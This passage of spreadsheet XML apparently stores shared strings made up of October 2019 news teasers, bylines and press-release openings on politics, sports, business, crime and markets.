    <t>Just how frequently do marathoners collapse? And what can race directors and runners do to mitigate risk?</t>
  </si>
  <si>
    <t>LANCASTER, Pa., Oct. 16, 2019 /PRNewswire/ -- Burnham Holdings, Inc. (Pink Sheets: BURCA), the parent company of multiple subsidiaries that...</t>
  </si>
  <si>
    <t>LOS ANGELES (Variety.com) – With her horned headpiece, impossible alabaster cheekbones and high-camp attitude, Maleficent looms as by far...</t>
  </si>
  <si>
    <t>By JILL COLVIN and AMANDA SEITZ Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — President Donald Trump "strongly condemns" a graphic and violent parody video that depicts a likeness of him shooting and...</t>
  </si>
  <si>
    <t>DALLAS, Oct. 18, 2019 /PRNewswire/ --Oncor Electric Delivery Company LLC ("Oncor") plans to release its third quarter 2019 results on Nov....</t>
  </si>
  <si>
    <t>BURLINGTON, Mass., Oct. 14, 2019 (GLOBE NEWSWIRE) -- Flexion Therapeutics, Inc. (Nasdaq:FLXN) today announced that the U.S. Food and Drug...</t>
  </si>
  <si>
    <t>Research Nester released a report titled “Capnography Market: Global Demand Analysis &amp; Opportunity Outlook 2027? which delivers detailed...</t>
  </si>
  <si>
    <t>BALTIMORE, Oct. 3, 2019 /PRNewswire/ -- Today, Senior Helpers®, the nation's premier provider of in-home senior care, announced the...</t>
  </si>
  <si>
    <t>Tickers: XTSX:VPT, PINX:VPTDF Tags: #Technology, #Healthcare Toronto, Ontario - TheNewswire - October 3, 2019 - Ventripoint Diagnostics...</t>
  </si>
  <si>
    <t>Stanley Muller</t>
  </si>
  <si>
    <t>Novacoin (CURRENCY:NVC) traded up 2% against the US dollar during the 24 hour period ending at 19:00 PM ET on October 7th. In the last...</t>
  </si>
  <si>
    <t>A CBI court here on Saturday directed the Special Magistrate to supply a certified copy of the closure report filed by the agency in the...</t>
  </si>
  <si>
    <t>On this first-ever National First Responders Day, what better way to show appreciation than signing the first-ever nationwide “thank you”...</t>
  </si>
  <si>
    <t>YARMOUTH, Mass. (AP) — A Massachusetts lawmaker has filed a bill to name the new Cape Cod Rail Trail bridge in honor of a soldier listed as...</t>
  </si>
  <si>
    <t>Job service also identifies 25 top-rated workplaces for millennials to find remote jobs. BOULDER, Colo. (PRWEB) October 14, 2019...</t>
  </si>
  <si>
    <t>Amie Cranswick</t>
  </si>
  <si>
    <t>High Octane Pictures has revealed a trailer, poster and images for the upcoming horror Blood Myth, ahead of its release next month. Written...</t>
  </si>
  <si>
    <t>Paddy McNair drew rave reviews from Northern Ireland manager Michael O’Neill after his brace powered the Green and White Army to a 3-2...</t>
  </si>
  <si>
    <t>BAR Editorial Board</t>
  </si>
  <si>
    <t>San Francisco Mayor London Breed. Photo: Jane Philomen Cleland San Francisco Mayor London Breed. Photo: Jane Philomen Cleland When San...</t>
  </si>
  <si>
    <t>A 39-year-old Saskatoon man is facing a number of charges following an investigation by the Saskatoon Police Drug Unit into methamphetamine trafficking. The man and a 23-year-old woman were arrested on October 3, 2019 in the 900 block 22nd Street West after detectives in the drug unit witnessed activity consistent with illegal drug transactions. A search of the Ford Mustang involved resulted in officers locating 36 grams of methamphetamine, 0.9 grams of fentanyl in individual baggies, 5 grams of crack cocaine in individual baggies, more than $200 cash, phones and drug paraphernalia. A subsequent search of an apartment in the 400 block of 3rd Avenue North resulted in officers locating a .45 calibre airsoft gun, bear spray and other drug paraphernalia. The 39-year-old man is facing numerous charges including; trafficking in methamphetamine, fentanyl and cocaine, possession of methamphetamine, fentanyl and cocaine, possession of the proceeds of crime, breach of parole and several weapons charges. The 23 year old woman was found to be wanted on warrants out of The Battlefords.</t>
  </si>
  <si>
    <t>DENVER, Oct. 17, 2019 /PRNewswire/ -- Gates (NYSE: GTES), a leading global provider of application-specific fluid power and power...</t>
  </si>
  <si>
    <t>DUBLIN, Oct. 18, 2019 /PRNewswire/ -- The "Ichthyosis- Pipeline Insight, 2019" drug pipelines has been added to ResearchAndMarkets.com's...</t>
  </si>
  <si>
    <t>by Jon Gambrell, The Associated Press</t>
  </si>
  <si>
    <t>DUBAI, United Arab Emirates — Dubai is betting billions of dollars that its Expo 2020 will draw 25 million visitors, encourage business and...</t>
  </si>
  <si>
    <t>openPR</t>
  </si>
  <si>
    <t>The Exploration study offers deep assessment of the Global Cloud retail Market and helps market participants to gain a solid base in the...</t>
  </si>
  <si>
    <t>BARRY HATTON Associated Press</t>
  </si>
  <si>
    <t>LISBON, Portugal (AP) — The center-left Socialist Party collected the most votes in Portugal's general election Sunday, an exit poll...</t>
  </si>
  <si>
    <t>October 15, 2019 - After seven years of marketing shows on and off the Las Vegas Strip, Las Vegas show marketer and comedian Philip Peredo...</t>
  </si>
  <si>
    <t>Harley-Davidson Inc said on Monday it has stopped production of its first electric motorcycle after discovering a glitch in the final...</t>
  </si>
  <si>
    <t>VENTURA, Calif. (AP)  A man who acknowledged shooting and killing a protected mountain lion that roamed the mountains near Los Angeles has...</t>
  </si>
  <si>
    <t>Debut Casting director TRACEY MOORE is the host of a new weekly podcast from PREMIERE NETWORKS and "DR. DAVE" KOLIN's DR. DAVE CREATIVE...</t>
  </si>
  <si>
    <t>By Katy Griffin</t>
  </si>
  <si>
    <t>RESIDENTS are being urged to be on their guard after two incidents of a bank card scam. Wiltshire Police say in both incidents the victims...</t>
  </si>
  <si>
    <t>The global mouthwash market is expected to display higher growth rate over the forecast period. The market is subject to witness a...</t>
  </si>
  <si>
    <t>Meanwhile, a source says Warner Bros. Studios has no plans to remove the 'Rock and Roll Part II' from the soundtrack or future versions of...</t>
  </si>
  <si>
    <t>Kathleen Sturgeon, Patch Staff</t>
  </si>
  <si>
    <t>There are more than 50 registered sex offenders recorded as living in Kennesaw in 2019.</t>
  </si>
  <si>
    <t>SAUSALITO, Calif., Oct. 14, 2019 /PRNewswire/ -- Not sure if your website is compliant with accessibility requirements—or if it even needs...</t>
  </si>
  <si>
    <t>Sofinnova Partners, a leading European venture capital firm based in Paris, London and Milan and specialized in Life Sciences, announced...</t>
  </si>
  <si>
    <t>Race leaders were dealt a devastating blow when strong winds caused the driver to lose control and roll the vehicle.</t>
  </si>
  <si>
    <t>ROSH HAAYIN, Israel, Oct. 3, 2019 /PRNewswire/ -- Pointer Telocation Ltd. (Nasdaq: PNTR) (TASE: PNTR), a leading provider of telematic...</t>
  </si>
  <si>
    <t>Over 100 Olympians are represented by the ISL, including 41 Olympic gold medals from the 2016 Olympic Games</t>
  </si>
  <si>
    <t>The American Chamber of Commerce - Bahrain (AmCham Bahrain) has announced its 15-member board for the 2019-2021 period with Qays H. Zu’bi...</t>
  </si>
  <si>
    <t>Mayor Bill de Blasio said the city will crack down on Battery Park vendors selling unauthorized tickets to the Statue of Liberty—the day...</t>
  </si>
  <si>
    <t>By ROB HARRIS AP Global Soccer Writer Undeterred by the resistance it faced last season, the Spanish soccer league is trying again to take...</t>
  </si>
  <si>
    <t>BRENTWOOD, Tenn., Oct. 03, 2019 (GLOBE NEWSWIRE) -- American Addiction Centers (AAC), a leading provider of substance use services, had...</t>
  </si>
  <si>
    <t>PORTOLA VALLEY, Calif., Oct. 15, 2019 /PRNewswire/ -- Bay Area Lyme Foundation, a leading sponsor of Lyme disease research in the U.S.,...</t>
  </si>
  <si>
    <t>By Jillian Morgan</t>
  </si>
  <si>
    <t>Director Daniel Roher’s Once Were Brothers: Robbie Robertson and The Band will open DOC NYC this fall following the film’s world premiere...</t>
  </si>
  <si>
    <t>Jason Scott</t>
  </si>
  <si>
    <t>(Bloomberg) -- Australia has rejected a U.S. extradition request for an Iranian student who had been accused of conspiring to smuggle...</t>
  </si>
  <si>
    <t>AKCAKALE, Turkey (AP) — Turkey says its military offensive has taken central Ras al-Ayn, a key border town in northeastern Syria, and its...</t>
  </si>
  <si>
    <t>By Entertainment Desk</t>
  </si>
  <si>
    <t>Samantha Akkineni will be sharing the screen space with Sharwanand in Janu, which is a remake of Tamil film 96, starring Trisha and Vijay...</t>
  </si>
  <si>
    <t>Media Advisory SANTA CLARA, Calif., Oct. 15, 2019 (GLOBE NEWSWIRE) -- PDF Solutions, Inc. (“PDF Solutions” or the...</t>
  </si>
  <si>
    <t>11 minutes ago HARRISBURG — A legislative tug-of-war over altering rules for child sexual abuse claims that occurred too long ago to file...</t>
  </si>
  <si>
    <t>Arbitration Panel Finds Securities Fraud in the Sale of 1 Global Capital, LLC First Large 1 Global Capital, LLC, Award ST. PETERSBURG,...</t>
  </si>
  <si>
    <t>By BILL PLASCHKE Los Angeles Times A baseball team desperately in need of a baseball story has smartly hired one. His name is Joe Maddon,...</t>
  </si>
  <si>
    <t>The Atlanta Braves will host the first game of National League Division Series as they take on the St. Louis Cardinals. This is the first...</t>
  </si>
  <si>
    <t>thesunbest</t>
  </si>
  <si>
    <t>Joseph Dempsey, research associate for defence and military analysis, said the launches, part of PyongYang’s strategy of developing an...</t>
  </si>
  <si>
    <t>On Oct. 8, 2019, veteran outreach organization Voice Of The Vet honored attorney Peter Palivos with an award of Appreciation for Service....</t>
  </si>
  <si>
    <t>THESSALONIKI, Greece (AP) — Police in northern Greece have detained 12 people who evaded security and staged a protest against Turkey's...</t>
  </si>
  <si>
    <t>EU fails to launch membership talks with Balkans hopefuls BRUSSELS (AP) — European Union leaders failed Friday to agree on launching...</t>
  </si>
  <si>
    <t>TD Ameritrade drops stock trading commissions in fee war</t>
  </si>
  <si>
    <t>Asian stocks skidded to a one-month low on Thursday after the United States opened a new front in its trade dispute with Europe by imposing...</t>
  </si>
  <si>
    <t>By Olympian readers</t>
  </si>
  <si>
    <t>SHARE...</t>
  </si>
  <si>
    <t>by Michael Gannon, Editor</t>
  </si>
  <si>
    <t>JFK AirTrain increase next month; bridge, tunnel tolls to rise in Jan. ’20</t>
  </si>
  <si>
    <t>Brandon Kelly</t>
  </si>
  <si>
    <t>With Hispanic Heritage Month in full swing, Billboard put together the 20 longest-leading albums of all time on the Top Latin Albums chart....</t>
  </si>
  <si>
    <t>A new study suggests that Leonardo da Vinci stood out in his own time as he does today - but not for his scientific or artistic genius;...</t>
  </si>
  <si>
    <t>BALTIMORE, Oct. 3, 2019 /PRNewswire-PRWeb/ -- In keeping with 2019's record breaking growth, Industrial Caulk and Seal installed over 1...</t>
  </si>
  <si>
    <t>Renata Jones</t>
  </si>
  <si>
    <t>GMB (CURRENCY:GMB) traded down 34% against the U.S. dollar during the 24-hour period ending at 11:00 AM E.T. on October 11th. Over the last...</t>
  </si>
  <si>
    <t>Nicole is at The Toronto Railway Museum to celebrate their 90th birthday this Saturday.</t>
  </si>
  <si>
    <t>Oct, Sat 12 2019 - 10:00 AM to 12:00 PM</t>
  </si>
  <si>
    <t>Oct, Thu 17 2019 - 3:00 PM to 4:00 PM</t>
  </si>
  <si>
    <t>GEORGETOWN, Ark. (News release) — If only opening up the water drainage in a wildlife management area were as simple as pouring in a few...</t>
  </si>
  <si>
    <t>HOUSTON, Oct. 1, 2019 /PRNewswire-PRWeb/ -- The coal industry is in transition. New technologies are being designed to advance the safe,...</t>
  </si>
  <si>
    <t>TORONTO — Injury has forced Toronto FC forward Jozy Altidore out of the U.S. game against Canada in CONCACAF Nations League play Oct. 15....</t>
  </si>
  <si>
    <t>Science equipment and underwater vehicles deployed from Brazil’s flagship oceanographic research vessel, Alpha Crucis, are to be tracked...</t>
  </si>
  <si>
    <t>RoomIt hotel bookings made globally help to reach donation milestone NEW YORK, NY / ACCESSWIRE / October 4, 2019 / Today, the World...</t>
  </si>
  <si>
    <t>Rhino, a leading insurtech startup aimed at cutting housing costs, announced today a new policy plan to lower housing costs in America by...</t>
  </si>
  <si>
    <t>NASHVILLE, Tenn. (AP) — A public school district in Tennessee say U.S. Immigration and Customs Enforcement agents tried getting student...</t>
  </si>
  <si>
    <t>Zimbabwe and Nepal have been readmitted as ICC Members following the conclusion of the ICC Board meetings in Dubai last night. Zimbabwe was...</t>
  </si>
  <si>
    <t>Copyright 2019 CNN. All rights reserved.</t>
  </si>
  <si>
    <t>PARIS (CNN) - When it comes to haute couture fashion, Paris is the place to be. One show didn’t go as planned when an attendee decided to...</t>
  </si>
  <si>
    <t>Fox 28 Spokane</t>
  </si>
  <si>
    <t>Photo Credit: Alamy Stock Photo Teens who drove when they had been drinking: 6.5%Teens who rode with a driver who had been drinking:...</t>
  </si>
  <si>
    <t>Milwaukee, WI, Oct. 15, 2019 (GLOBE NEWSWIRE) -- Pepper Construction is pleased to announce the successful launch of the first fully...</t>
  </si>
  <si>
    <t>By REBECCA SANTANA Associated Press</t>
  </si>
  <si>
    <t>IRONTON, La. (AP) — Back when the Mississippi River flowed wild, its ever-shifting waters acted as a continent-sized earth mover, picking...</t>
  </si>
  <si>
    <t>The tech industry has been on the rise in New York City. According to government statistics, between 2010-2017, employment in the tech...</t>
  </si>
  <si>
    <t>A 25-year-old Instagram influencer was stopped by LAX airport security after she was caught with “like 20” bags of Flamin’ Hot Cheetos in...</t>
  </si>
  <si>
    <t>Du Juan</t>
  </si>
  <si>
    <t>The seven-day 2019 Chinese Opera Culture Week, which ended on Oct 8, attracted around 190,000 visitors to Beijing Garden Expo Park to enjoy...</t>
  </si>
  <si>
    <t>Connor Toole</t>
  </si>
  <si>
    <t>Of course, you can’t talk about this topic without mentioning Pete Rose, who was banned from baseball for life in 1989 following a...</t>
  </si>
  <si>
    <t>VANCOUVER, BC / ACCESSWIRE / October 3, 2019 / International Montoro Resources Inc. (TSXV:IMT) (the "Company"). Private Placement Closed...</t>
  </si>
  <si>
    <t>ATLANTA, Oct. 2, 2019 /PRNewswire/ -- EmployBridge today announced that Mark Neas has joined the company's senior management team as chief...</t>
  </si>
  <si>
    <t>SOURCE BII Summit Blockchain Innovation and Investment Summit - Dubai United Arab Emirates. 20th November 2019 at the Ritz-Carlton JBR...</t>
  </si>
  <si>
    <t>News stories are free to read. Click here for full access to all the features, articles and archive from only £2.99.</t>
  </si>
  <si>
    <t>Ultimate for Him BCF Drummond Golf Barbeques Galore Supercheap Auto Rebel Sport Ultimate Kids Australian Geographic Rebel Sport...</t>
  </si>
  <si>
    <t>"Mike Corder" /</t>
  </si>
  <si>
    <t>Thousands of Dutch farmers are heading to The Hague, many driving in slow-moving convoys of tractors that snarled traffic in the morning...</t>
  </si>
  <si>
    <t>Law Offices of Howard G. Smith announces that a class action lawsuit has been filed on behalf of investors who purchased Myriad Genetics,...</t>
  </si>
  <si>
    <t>At ILA 2019 Conference (booth 1000), educators can see first-hand how the digital solution makes it easy to provide engaging, effective...</t>
  </si>
  <si>
    <t>Motion Control Dance awarded share of £1m fund to help Wales become a better place for sport A DANCE company based in Barry has been...</t>
  </si>
  <si>
    <t>A second whistleblower has spoken to the intelligence community's internal watchdog and has information that backs the original...</t>
  </si>
  <si>
    <t>Christina Blizzard                        More from Christina Blizzard</t>
  </si>
  <si>
    <t>LONDON – It seems odd at this critical time in U.K. history that one of the most vigorous debates seems to be about what Prime Minister...</t>
  </si>
  <si>
    <t>Jacob Sonenshine</t>
  </si>
  <si>
    <t>Artificial intelligence is a hugely important piece to Google's business but it's also very hard to value.</t>
  </si>
  <si>
    <t>Georgia Nicols</t>
  </si>
  <si>
    <t>We have the ‘all clear’ today to shop and do business. The Moon is in Taurus</t>
  </si>
  <si>
    <t>Today, Kirlin Design Build, LLC (KDB), one of the country’s leading engineering and construction companies, announced that it has been...</t>
  </si>
  <si>
    <t>LAKE MARY, Fla., Oct. 1, 2019 /PRNewswire-PRWeb/ -- IMS Global Learning Consortium (IMS Global/IMS), the world-leading non-profit...</t>
  </si>
  <si>
    <t>Oct, Sun 13 2019 - 3:00 PM to 6:00 PM</t>
  </si>
  <si>
    <t>Wagga Wagga Mayor Greg Conkey will travel to Sydney in an electric car as apart of their ‘Cities Power Partnership’ initiative to push...</t>
  </si>
  <si>
    <t>Letters To</t>
  </si>
  <si>
    <t>Letters to the editor of The Jersey Journal</t>
  </si>
  <si>
    <t>Zacks Investment Research downgraded shares of BRAINSWAY LTD/S (NASDAQ:BWAY) from a hold rating to a sell rating in a report released on...</t>
  </si>
  <si>
    <t>By                                               Press Association 2019</t>
  </si>
  <si>
    <t>Christian Eriksen insists uncertainty surrounding his and some of his Tottenham team-mates’ future is not the cause of their horrible start...</t>
  </si>
  <si>
    <t>Posted 3:36 pm, October 7, 2019, by Web Staff,</t>
  </si>
  <si>
    <t>(Johannes Eisele/AFP/Getty Images) (Johannes Eisele/AFP/Getty Images) MONTREAL — A class action lawsuit has been filed by a Canadian law...</t>
  </si>
  <si>
    <t>Elizabeth Franklin</t>
  </si>
  <si>
    <t>A New business Strategy report released by HTF MI with title Barcode Software Market Insights 2019, Global and Chinese Analysis and...</t>
  </si>
  <si>
    <t>The federal government has spent millions of dollars subsidising new private dams, contradicting a minister's claims very few are being...</t>
  </si>
  <si>
    <t>Yonhap News Agency</t>
  </si>
  <si>
    <t>Oct. 8 (UPI) -- The United Nations has granted sanctions waivers for equipment to be brought into North Korea for next week's inter-Korean...</t>
  </si>
  <si>
    <t>WASHINGTON (AP)  Facebook CEO Mark Zuckerberg promoted free expression Thursday during a speech at Georgetown University. But reporters...</t>
  </si>
  <si>
    <t>New York, Oct. 10, 2019 (GLOBE NEWSWIRE) -- Capsule8 today announced the appointment of Rob Harrison as Chief Product Officer (CPO). As...</t>
  </si>
  <si>
    <t>Wei Yan Aung</t>
  </si>
  <si>
    <t>YANGON—On this day 72 years ago, the Nu-Attlee Agreement, a treaty between the government of the United Kingdom and the provisional...</t>
  </si>
  <si>
    <t>(BPT) - Baby Boomers may be aging, but that doesn’t mean they’re slowing down anytime soon. As a group, these adults continue to lead...</t>
  </si>
  <si>
    <t>Andrew Selsky, Associated Press</t>
  </si>
  <si>
    <t>Louis Silva pets one of his dairy cows at Silva Family Dairy in Tomales, Calif. Tuesday, August 27, 2019....</t>
  </si>
  <si>
    <t>Lorraine Haynes, proprietor of K and K Toys in Brisbane Australia explains the benefits of toys and the many positive effects toys have on...</t>
  </si>
  <si>
    <t>By Chris Isidore, CNN Business</t>
  </si>
  <si>
    <t>The steady decline of America's steel industry is continuing, despite President Donald Trump's efforts to protect it through tariffs on...</t>
  </si>
  <si>
    <t>The St. Louis Cardinals' front office says baseballs have suddenly lost their juice this postseason, supporting a claim from a prominent...</t>
  </si>
  <si>
    <t>The U.S. Federal Aviation Administration on Friday released a report by an international aviation panel that criticized the agency's...</t>
  </si>
  <si>
    <t>Phillip Horton</t>
  </si>
  <si>
    <t>Mercedes has its first opportunity to equal Ferrari’s record of six straight Constructors’ Championship, depending on the outcome of the...</t>
  </si>
  <si>
    <t>NOVARA and LAINATE, Italy, Oct. 16, 2019 /PRNewswire/ -- Two prominent Italian research and technology companies, both with extensive...</t>
  </si>
  <si>
    <t>The "Pancreatic Cancer - Global Market Outlook (2017-2026)" report has been added to ResearchAndMarkets.com's offering. The Global...</t>
  </si>
  <si>
    <t>DALLAS (AP) — A probate court judge has halted a funeral scheduled for Saturday evening for a woman shot in her home by a Fort Worth police...</t>
  </si>
  <si>
    <t>Mr Frydenberg is visiting affected regions with Drought Minister David Littleproud, kicking off Thursday in the NSW town of Inverell before...</t>
  </si>
  <si>
    <t>Michael Turtle</t>
  </si>
  <si>
    <t>Seeing the photos in recent days of the crowds of people climbing up Uluru, I can't help but wonder what is motivating them. It's not the...</t>
  </si>
  <si>
    <t>Alexei Leonov, the first person to walk in space, has died, Russian space agency Roscosmos announced Friday. He was 85. His assistant,...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / October 1, 2019 / Levi &amp; Korsinsky, LLP announces that class action lawsuits have commenced on behalf of...</t>
  </si>
  <si>
    <t>Holly Kozelsky</t>
  </si>
  <si>
    <t>If it’s edible, there’s a good chance that it comes in pumpkin spice flavor this month.</t>
  </si>
  <si>
    <t>THOMASVILLE, N.C., Oct. 10, 2019 (GLOBE NEWSWIRE) -- Old Dominion Freight Line was named the Overall Winner of the MASTIO Quality Award...</t>
  </si>
  <si>
    <t>The Origins Project Foundation, Inc. is proud to announce it has been granted tax-exempt status under Section 501(c)(3) of the United...</t>
  </si>
  <si>
    <t>Megan Nisbet</t>
  </si>
  <si>
    <t>SixStarCruises has launched an epic cruise lasting over 123 days with first class flights and luxury hotels</t>
  </si>
  <si>
    <t>To the editor: I am writing in regards the letter in the Oct. 19 issue of the “Times” by Paul G. Clifford. While we can all agree that we...</t>
  </si>
  <si>
    <t>The "SafeRail: Ensuring Mission Critical Safety and Security Across the Rail and Transit Network" conference has been added to...</t>
  </si>
  <si>
    <t>Tens of thousands of Thomas Cook customers applied for refunds on the first day of a claims website opening. More than 60,000 claims were...</t>
  </si>
  <si>
    <t>By Kathleen Ross  For The News Courier</t>
  </si>
  <si>
    <t>I understand that not everyone is madly in love with dogs, or cats, or children, or ice cream…to each his own. But if non-animal people...</t>
  </si>
  <si>
    <t>Brian Naylor</t>
  </si>
  <si>
    <t>House Democrats have opened another front in the ongoing battle with the Trump administration over documents Democrats are seeking in their...</t>
  </si>
  <si>
    <t>BOISE, Idaho, Oct. 01, 2019 (GLOBE NEWSWIRE) -- US Ecology, Inc. (the “Company”) [NASDAQ: ECOL] today declared that stockholders of...</t>
  </si>
  <si>
    <t>© Copyright Battlefords News Optimist</t>
  </si>
  <si>
    <t>TORONTO — McLeod Bethel-Thompson threw two touchdown passes as the Toronto Argonauts held on for a 28-21 home win over the Ottawa Redblacks...</t>
  </si>
  <si>
    <t>Netflix Inc. announced the net addition of 6.77 million paying subscribers in its third-quarter financial results Wednesday afternoon, an...</t>
  </si>
  <si>
    <t>Former Vice President Joe Biden’s presidential campaign complained to The New York Times after it published an op-ed about Biden and his...</t>
  </si>
  <si>
    <t>To get published by a publisher takes a team. One of those team members we need is a literary agent. But how do you find an agent? Are...</t>
  </si>
  <si>
    <t>ATLANTA, Oct. 07, 2019 (GLOBE NEWSWIRE) -- The Michaels Companies, Inc., (NASDAQ: MIK) the largest arts and crafts retail chain in North...</t>
  </si>
  <si>
    <t>FORT LAUDERDALE, Fla., Oct. 4, 2019 /PRNewswire-PRWeb/ -- For over 91 years, Welcome Wagon has been introducing new movers to local...</t>
  </si>
  <si>
    <t>By TIM REYNOLDS AP Basketball Writer</t>
  </si>
  <si>
    <t>When major corporations have done something to anger Chinese authorities in recent years, the playbook has called for one thing: an...</t>
  </si>
  <si>
    <t>A second whistleblower has come forward with information about President Donald Trump's dealings with Ukraine, adding to the impeachment...</t>
  </si>
  <si>
    <t>Prometeon Tyre Group Commercial Solutions has unveiled its Nextroad brand of tires to support regional applications. Drive and steer...</t>
  </si>
  <si>
    <t>Media Release 8 October, 2019 Take a Mental Health Break for Mental Health Week The Mental Health Coalition of South Australia is asking...</t>
  </si>
  <si>
    <t>LONDON and ROTTERDAM, Netherlands, Oct. 7, 2019 /PRNewswire/ -- Unilever, owner of brands including Dove, Ben &amp; Jerry's, Lipton and Omo has...</t>
  </si>
  <si>
    <t>SOURCE Frost &amp; Sullivan By expanding aggressively in both China and the United States, the company offers a superior end-to-end solution...</t>
  </si>
  <si>
    <t>Written By:  Jeremy Turley        |;Jeremy Turley</t>
  </si>
  <si>
    <t>Once the state finishes assessing the damage to infrastructure and crops from the October snowstorm, Gov. Doug Burgum is expected to...</t>
  </si>
  <si>
    <t>[CORRECTED: Original mistakenly referenced MSCI ACWI Equal Weight Price Return Index data rather than Total Return data of the same index....</t>
  </si>
  <si>
    <t>Express Employment Outlines “Four C’s of Onboarding” The Best Way to Keep Workers is to Welcome Them Properly TORONTO, Oct. 09, 2019...</t>
  </si>
  <si>
    <t>The "Asia Pacific Air Cargo Market to 2027 - Regional Analysis and Forecasts by Type; Service; and End User" report has been added to...</t>
  </si>
  <si>
    <t>DUBLIN, Oct. 18, 2019 /PRNewswire/ -- The "Worldwide Cable Modem CPE Market Forecast, 2019-2023" report has been added to...</t>
  </si>
  <si>
    <t>Apple's chief executive Tim Cook said on Thursday he was a "supporter" of immigration and was against any ceiling on the hiring of...</t>
  </si>
  <si>
    <t>Lifeworks, the Charleston based marriage counseling and couples therapy specialist, has launched updated services for local residents. Dr...</t>
  </si>
  <si>
    <t>THE CANADIAN PRESS</t>
  </si>
  <si>
    <t>NEW YORK — Indigenous water activist Autumn Peltier addressed hundreds of international guests at UN headquarters in Manhattan Saturday. The 15-year-old activist from Wiikwemkoong First Nation on Manitoulin Island in northern Ontario urged the global community to respect the sacredness and importance of clean water. “I’ve said it once, and I’ll say it again, we can’t eat money, or drink oil.” Peltier spoke at the Global Landscapes Forum, a platform on sustainable land use founded by UN Environment and the World Bank that’s dedicated to achieving development and climate goals. She used the speech to draw attention to the lack of clean water in numerous Indigenous communities, which she says sparked her activism. “All across these lands, we know somewhere were someone can’t drink the water. Why so many, and why have they gone without for so long?” She said she’s been taught traditional knowledge from an early age about the sacredness of water, and that more should learn these lessons. “Maybe we need to have more elders and youth together sitting at the decision table when people make decisions about our lands and waters.” Peltier called for an end to plastic use as one step in restoring a more sustainable world. Her speech comes a day after huge crowds took to the streets in Canada as part of a global climate strike. The speech was her second at the UN headquarters, having urged the General Assembly to “warrior up” and take a stand for our planet last year. Peltier, who is nominated for the 2019 International Children’s Peace Prize by the David Suzuki Foundation, has spread her message at hundreds of events around the world. In 2015, Peltier attended the Children’s Climate Conference in Sweden, and a year later, confronted Prime Minister Justin Trudeau about his “broken promises” at a meeting of the Assembly of First Nations.</t>
  </si>
  <si>
    <t>Justin Leger</t>
  </si>
  <si>
    <t>At least one expert believes Tom Brady is tradable. No, not in fantasy football. In real life. Mike Florio of ProFootballTalk joined 98.5...</t>
  </si>
  <si>
    <t>Frank Haggerty, Neighbor</t>
  </si>
  <si>
    <t>If you consider foliage viewing from above the treetops. You can do it on Ski chair lift rides or in Warren you can go in a helicopter.</t>
  </si>
  <si>
    <t>Analysis by Chris Cillizza, CNN Editor-at-large President Donald Trump is clearly angry and shaken -- despite his occasional public...</t>
  </si>
  <si>
    <t>Refereum partners with OpenSea, the leading digital marketplace to offer $RFR as a payment option for OpenSea's 135 blockchain applications...</t>
  </si>
  <si>
    <t>By Alaa Elassar, CNN</t>
  </si>
  <si>
    <t>Could you survive for an entire year without access to Snapchat, TikTok, Instagram or any other app? What if someone paid you a whopping...</t>
  </si>
  <si>
    <t>University to leverage Blackboard Learn Ultra to enhance learner engagement</t>
  </si>
  <si>
    <t>Glasgow’s Lord Provost has been urged to resign after it emerged she has claimed £8,000 in expenses for clothes, shoes and beauty products....</t>
  </si>
  <si>
    <t>Staff report news@morningjournal.com @MorningJournal on Twitter</t>
  </si>
  <si>
    <t>An upcoming program at the Westshore Campus of Cuyahoga Community College will examine the environmental resurgence of the Cuyahoga River...</t>
  </si>
  <si>
    <t>(AP Photo/Evan Vucci). Secretary of State Mike Pompeo listens as President Donald Trump speaks during an Armed Forces welcome ceremony for...</t>
  </si>
  <si>
    <t>As the Nebraska football team returns from its first bye week and prepares to host Indiana on Saturday afternoon, it's an ideal time to...</t>
  </si>
  <si>
    <t>Shropshire's</t>
  </si>
  <si>
    <t>MELINDA DESLATTE Associated Press</t>
  </si>
  <si>
    <t>BATON ROUGE, La. (AP) — Democratic Gov. John Bel Edwards and his Republican opponent Eddie Rispone are trading attacks in their first TV...</t>
  </si>
  <si>
    <t>By Jarrett Renshaw and James Oliphant</t>
  </si>
  <si>
    <t>By Jarrett Renshaw and James Oliphant COLUMBUS, Ohio, Oct 17 (Reuters) - For long-shot moderates trying to compete for the Democratic...</t>
  </si>
  <si>
    <t>SANTA ROSA, Calif., Oct. 03, 2019 (GLOBE NEWSWIRE) -- Luther Burbank Corporation (the “Company”) (NASDAQ: LBC), the holding company for...</t>
  </si>
  <si>
    <t>The "Tripod Mounted 3D Laser Scanners - Global Market Outlook (2017-2026)" report has been added to ResearchAndMarkets.com's offering. The...</t>
  </si>
  <si>
    <t>COLTEN BARTHOLOMEW cbartholomew@madison.com</t>
  </si>
  <si>
    <t>With one interception late in the game that led to Illinois’ winning field goal and 24-23 upset of the No. 6 Badgers, the perception of the...</t>
  </si>
  <si>
    <t>Investors sentiment decreased to 1.52 in Q2 2019. Its down 0.07, from 1.59 in 2019Q1. It turned negative, as 10 investors sold Dicerna...</t>
  </si>
  <si>
    <t>WASHINGTON--The U.S. Supreme Court on Friday agreed to take up a major abortion case that could lead to new curbs on access to the...</t>
  </si>
  <si>
    <t>By: Bob D'Angelo, Cox Media Group National Content Desk</t>
  </si>
  <si>
    <t>A South Carolina firefighter was killed Friday when he was hit by a semi-truck while assisting the victim of a car crash, authorities said.</t>
  </si>
  <si>
    <t>Palladio Biosciences, Inc. (Palladio) http://palladiobio.com/, a privately-owned, clinical stage biopharmaceutical company developing...</t>
  </si>
  <si>
    <t>PARIS — France’s foreign ministry on Thursday demanded Iran release French-Iranian dual national Fariba Adelkhah. “It is vital and urgent...</t>
  </si>
  <si>
    <t>LOS ANGELES, CA / ACCESSWIRE / October 2, 2019 / Ventura Cannabis and Wellness Corp. (CSE:VCAN)("Ventura" or the "Company") released...</t>
  </si>
  <si>
    <t>RWE (FRA:RWE) has been given a €30.00 ($34.88) price objective by equities research analysts at Barclays in a research report issued on...</t>
  </si>
  <si>
    <t>Today, Just Thrive® released Ultimate IgG, an immune-boosting dietary supplement that supports gut health. IgG, or Immunoglobulin G, is an...</t>
  </si>
  <si>
    <t>Jo Hartley</t>
  </si>
  <si>
    <t>In Australia, up to 9 per cent of babies are born each year with foetal alcohol spectrum disorder. Mixed messages about drinking during...</t>
  </si>
  <si>
    <t>BATON ROUGE, La., Oct. 03, 2019 (GLOBE NEWSWIRE) -- Sparkhound, a leading digital solutions firm providing trusted implementation of...</t>
  </si>
  <si>
    <t>by Julie Carr Smyth And Bill Barrow, The Associated Press</t>
  </si>
  <si>
